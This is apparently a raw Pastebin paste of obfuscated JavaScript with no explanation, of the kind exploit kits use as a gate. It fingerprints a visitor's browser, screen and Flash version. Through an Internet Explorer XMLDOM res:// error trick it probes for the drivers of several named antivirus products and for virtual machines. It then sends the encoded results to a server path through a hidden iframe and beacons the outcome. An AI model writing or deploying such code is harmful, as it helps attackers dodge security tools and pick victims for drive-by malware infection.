Advertisement
Guest User

Untitled

a guest
Mar 26th, 2017
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.79 KB | None | 0 0
  1. (function()
  2. {
  3. try
  4. {
  5. (function() {
  6. var x = new XMLHttpRequest();
  7. x.open('GET', '/x.gif?t=2005770848&r=5&data='+encodeURIComponent('jep'), true);
  8. x.send();
  9. })();
  10.  
  11. function h(c, b) {
  12. e.c = c;
  13. e.r = b;
  14. var a = document.createElement("iframe");
  15. a.style.position = "absolute";
  16. a.width = "10px";
  17. a.height = "10px";
  18. //a.style.top = "-1000em";
  19. //a.style.left = "-1000em";
  20. a.name = "33ff2a4712374c9f";
  21. var h = encodeURIComponent,
  22. d;
  23. d = JSON.stringify(e);
  24. d += "";
  25. var AL = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  26. var g, f, k = [],
  27. l = d.length - d.length % 3;
  28. if (0 !== d.length) {
  29. for (g = 0; l > g; g += 3) f = d.charCodeAt(g) << 16 | d.charCodeAt(g + 1) << 8 | d.charCodeAt(g + 2), k.push(AL.charAt(f >> 18)), k.push(AL.charAt(f >> 12 & 63)), k.push(AL.charAt(f >> 6 & 63)), k.push(AL.charAt(63 & f));
  30. switch (d.length - l) {
  31. case 1:
  32. f = d.charCodeAt(g) << 16;
  33. k.push(AL.charAt(f >> 18) + AL.charAt(f >> 12 & 63) + "==");
  34. break;
  35. case 2:
  36. f = d.charCodeAt(g) << 16 | d.charCodeAt(g + 1) << 8, k.push(AL.charAt(f >> 18) + AL.charAt(f >> 12 & 63) + AL.charAt(f >> 6 & 63) + "=")
  37. }
  38. d = k.join("")
  39. }
  40. a.src = "/t1q8p4saz9en1cgjr2_-_lidrwl71tsux8ea?q=" + h(d);
  41. document.body.appendChild(a);
  42.  
  43. }
  44.  
  45. function n() {
  46. var c;
  47. navigator.userAgent.match(/MSIE [6-9]/) ? c = "console" in window : (c = Object.keys(window).join(""), c = c.indexOf("__BROW") !== -1 || c.indexOf("__IE_DEV") !== -1);
  48. e.f = c;
  49. e.m = [screen.width, screen.height, "devicePixelRatio" in window ? window.devicePixelRatio : 0, "deviceXDPI" in screen ? screen.deviceXDPI : 0, "logicalXDPI" in screen ? screen.logicalXDPI : 0].join("|");
  50. var b;
  51. e.a = 0;
  52. try {
  53. b = new ActiveXObject("ShockwaveFlash.ShockwaveFlash")
  54. } catch (d) {
  55. b = document.createElement("object"), b.setAttribute("classid", "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000")
  56. }
  57. b && "GetVariable" in b && (e.a = b.GetVariable("$version").replace(/[^0-9\.\x2c]+/g, ""));
  58.  
  59. if (b = l(a + "pci.sys"), c = l(a + "wtf.sys"), b == c) h(1, 106);
  60. else b:
  61. {
  62. p = c % 1E3,
  63. b = {
  64. h: [a + "ehdrv.sys", a + "eamon.sys", a + "eamonm.sys"],
  65. i: [a + "klif.sys", a + "klflt.sys", a + "kneps.sys"],
  66. c: [a + "tmtdi.sys", a + "tmactmon.sys", a + "tmcomm.sys", a + "tmevtmgr.sys"],
  67. d: [a + "mbam.sys", a + "mwac.sys", a + "mbae.sys", q + "mbae.dll"],
  68. e: [a + "hmpalert.sys"],
  69. j: ["invguestie/icon.png"]
  70. //l: [a + "vmci.sys", a + "vboxdrv.sys"]
  71. };
  72. for (var m in b)
  73. for (c = 0; c < b[m].length; c++) {
  74. var n = p;
  75. if (l(b[m][c]) % 1E3 !== n) {
  76. h(0, "2" + m + c.toString() + "");
  77. break b
  78. }
  79. }
  80. h(1, 1)
  81. }
  82. //h(1, 1)
  83. }
  84.  
  85. function l(a) {
  86. -1 == a.indexOf("/") && (a += "/#16/#1");
  87. a = "res://" + a;
  88. var b;
  89. try {
  90. b = new ActiveXObject("Microsoft.XMLDOM"), b.async = 0, b.loadXML('<!DOCTYPE _ SYSTEM "' + a + '">')
  91. } catch (m) {}
  92. return b && b.parseError.errorCode
  93. }
  94. var e = {},
  95. q = "C:\\Windows\\System32\\",
  96. a = q + "drivers\\",
  97. p;
  98. e.g = "cpuClass" in navigator;
  99. e.b = navigator.appVersion;
  100. n();
  101. } catch (e) {
  102. (new Image).src="/e.gif?t=2005770848&r=53&data="+encodeURIComponent(e);
  103. }
  104. })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement